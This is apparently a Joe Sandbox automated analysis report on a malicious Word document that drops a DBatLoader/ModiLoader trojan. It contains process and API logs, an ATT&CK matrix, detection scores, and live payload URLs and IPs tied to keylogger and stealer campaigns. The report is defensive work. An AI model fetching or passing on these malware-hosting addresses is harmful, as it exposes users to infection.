            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,7_2_028F58B4
            Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Windows\SysWOW64\brightness.exeAPI call chain: ExitProcess graph end nodegraph_7-29075
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_0290F024 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,7_2_0290F024
            Source: C:\Windows\SysWOW64\brightness.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_02908798 LoadLibraryW,GetProcAddress,FreeLibrary,7_2_02908798
            Source: C:\Windows\SysWOW64\brightness.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,7_2_028F5A78
            Source: C:\Windows\SysWOW64\brightness.exeCode function: GetLocaleInfoA,7_2_028FA790
            Source: C:\Windows\SysWOW64\brightness.exeCode function: GetLocaleInfoA,7_2_028FA744
            Source: C:\Windows\SysWOW64\brightness.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,7_2_028F5B84
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028F918C GetLocalTime,7_2_028F918C
            Source: C:\Windows\SysWOW64\brightness.exeCode function: 7_2_028FB70C GetVersionExA,7_2_028FB70C
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information22
            Scripting
            1
            Valid Accounts
            1
            Native API
            1
            Valid Accounts
            1
            Valid Accounts
            121
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts33
            Exploitation for Client Execution
            22
            Scripting
            1
            Access Token Manipulation
            1
            Valid Accounts
            LSASS Memory211
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            DLL Side-Loading
            1
            Process Injection
            1
            Access Token Manipulation
            Security Account Manager1
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            1
            Virtualization/Sandbox Evasion
            NTDS1
            Process Discovery
            Distributed Component Object ModelInput Capture222
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Process Injection
            LSA Secrets1
            System Network Connections Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information
            Cached Domain Credentials2
            File and Directory Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Obfuscated Files or Information
            DCSync25
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            zYj1wg0cM2.doc70%VirustotalBrowse
            zYj1wg0cM2.doc58%ReversingLabsWin32.Exploit.DBatLoader
            zYj1wg0cM2.doc100%AviraW97M/Agent.5915124
            zYj1wg0cM2.doc100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Windows\SysWOW64\brightness.exe75%ReversingLabsWin32.Trojan.ModiLoader
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://amazonenviro.com/d0%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsg100%Avira URL Cloudmalware
            http://amazonenviro.com/245_Aiymwhpjxsgk0%Avira URL Cloudsafe
            http://amazonenviro.com/245_Aiymwhpjxsgs)I00%Avira URL Cloudsafe
            http://amazonenviro.com/245_AiymwhpjxsgU)0%Avira URL Cloudsafe
            http://amazonenviro.com/245_AiymwhpjxsgX0%Avira URL Cloudsafe
            http://amazonenviro.com/0%Avira URL Cloudsafe
            http://amazonenviro.com:80/245_Aiymwhpjxsg100%Avira URL Cloudmalware
            http://amazonenviro.com/245_AiymwhpjxsgXXg0%Avira URL Cloudsafe
            http://amazonenviro.com/245_AiymwhpjxsgHVg0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            amazonenviro.com
            166.62.27.188
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://amazonenviro.com/245_Aiymwhpjxsgtrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://amazonenviro.com/dbrightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://amazonenviro.com/245_AiymwhpjxsgHVgbrightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2233780799.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2341429220.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2277233447.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2930996778.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2449112148.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3027231666.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984339875.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://amazonenviro.com/brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984089954.00000000006F4000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              http://amazonenviro.com/245_Aiymwhpjxsgkbrightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://amazonenviro.com:80/245_Aiymwhpjxsgbrightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              http://amazonenviro.com/245_AiymwhpjxsgXbrightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://amazonenviro.com/245_AiymwhpjxsgU)brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://amazonenviro.com/245_AiymwhpjxsgXXgbrightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://amazonenviro.com/245_Aiymwhpjxsgs)I0brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              166.62.27.188
              amazonenviro.comUnited States
              26496AS-26496-GO-DADDY-COM-LLCUSfalse
              147.124.216.113
              unknownUnited States
              1432AC-AS-1USfalse
              Joe Sandbox version:42.0.0 Malachite
              Analysis ID:1587350
              Start date and time:2025-01-10 08:57:48 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 12s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Number of analysed new started processes analysed:9
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • GSI enabled (VBA)
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:zYj1wg0cM2.doc
              (renamed file extension from none to doc, renamed because original name is a hash value)
              Original Sample Name:96882b077a607f34cd963461341d728982e2075ffd4891f1b91e915da904cfe0
              Detection:MAL
              Classification:mal100.troj.expl.evad.winDOC@4/3@1/2
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 23
              • Number of non-executed functions: 37
              Cookbook Comments:
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 52.109.89.18, 52.113.194.132, 13.89.179.8, 2.21.65.130, 2.21.65.149, 2.23.242.162, 52.111.236.33, 52.111.236.35, 52.111.236.32, 52.111.236.34, 52.109.28.47, 40.126.32.72, 4.175.87.197, 13.107.246.45
              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, weu-azsc-config.officeapps.live.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, e26769.dscb.akamaiedge.net, nleditor.osi.office.net, uks-azsc-000.roaming.officeapps.live.com, prod-eu-resolver.natur
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtOpenFile calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              TimeTypeDescription
              02:59:24API Interceptor114x Sleep call for process: brightness.exe modified
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              166.62.27.188yxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • amazonenviro.com/245_Aiymwhpjxsg
              147.124.216.113ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 147.124.216.113/image.exe
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 147.124.216.113/albt.exe
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              amazonenviro.comyxU3AgeVTi.exeGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              ITT # KRPBV2663 .docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
              • 166.62.27.188
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              AS-26496-GO-DADDY-COM-LLCUShttps://jmak-service.com/3225640388Get hashmaliciousHTMLPhisherBrowse
              • 107.180.119.1
